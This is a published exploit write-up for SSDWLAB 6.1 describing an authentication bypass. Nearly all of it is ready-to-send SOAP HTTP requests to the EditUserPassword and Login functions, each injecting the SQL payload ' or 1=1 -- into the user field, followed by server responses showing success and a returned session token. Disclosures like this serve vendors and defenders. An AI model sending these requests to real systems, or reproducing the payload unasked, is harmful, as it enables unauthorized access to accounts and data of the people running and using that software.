# Exploit Title: SSDWLAB 6.1 - Authentication Bypass
# Date: 2019-10-01
# Exploit Author: Luis Buendía (exoticpayloads)
# Vendor Homepage: http://www.sbpsoftware.com/
# Version: 6.1
# Tested on: IIS 7.5
# CVE : Pending
#Description: By injection on the SOAP function in the EditUserPassword function, it is possible to create a "fake" user and authenticate with it.

Request to the EditUserPassword Function

POST /PATH-TO-WEB-SERVICE/WebService.asmx HTTP/1.1
Host: XXXXXXX.com
Content-Type: text/xml; charset=utf-8
Content-Length: 462
SOAPAction: "http://tempuri.org/EditUserPassword"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <EditUserPassword xmlns="http://tempuri.org/">
      <coUser>' or 1=1 --</coUser>
      <sOldPwd>string</sOldPwd>
      <sNewPwd>string</sNewPwd>
      <coLang>ENG</coLang>
    </EditUserPassword>
  </soap:Body>
</soap:Envelope>

Example of Response when injection is succesfull

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/xml; charset=utf-8
X-AspNet-Version: 4.0.30319
X-Powered-By: XXX.XXX
Content-Length: 421

<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><EditUserPasswordResponse xmlns="http://tempuri.org/"><EditUserPasswordResult><ListMsg /><ErrLevel>0</ErrLevel><MetaData /></EditUserPasswordResult></EditUserPasswordResponse></soap:Body></soap:Envelope>

Request to Login After Successful Request

POST /PATH-TO-WEB-SERVICE/WebService.asmx HTTP/1.1
Host: XXXXXXX.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: https://XXXXXXX.com/PATH-TO-WEB-SERVICE/main.swf/[[DYNAMIC]]/2
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Login"
Content-Length: 406

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:s="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <SOAP-ENV:Body>
    <tns:Login xmlns:tns="http://tempuri.org/">
      <tns:sUser>' or 1=1 --</tns:sUser>
      <tns:sPwd>string</tns:sPwd>
      <tns:sLang>ENG</tns:sLang>
    </tns:Login>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

Example of succesfull login

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
X-AspNet-Version: 4.0.30319
X-Powered-By: XXX.XXX
Connection: close
Content-Length: 422

<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><LoginResponse xmlns="http://tempuri.org/"><LoginResult><ListMsg /><ErrLevel>0</ErrLevel><MetaData /><data>d62cc3c0b2e3413cb8b4a85b0fa6177b</data></LoginResult></LoginResponse></soap:Body></soap:Envelope>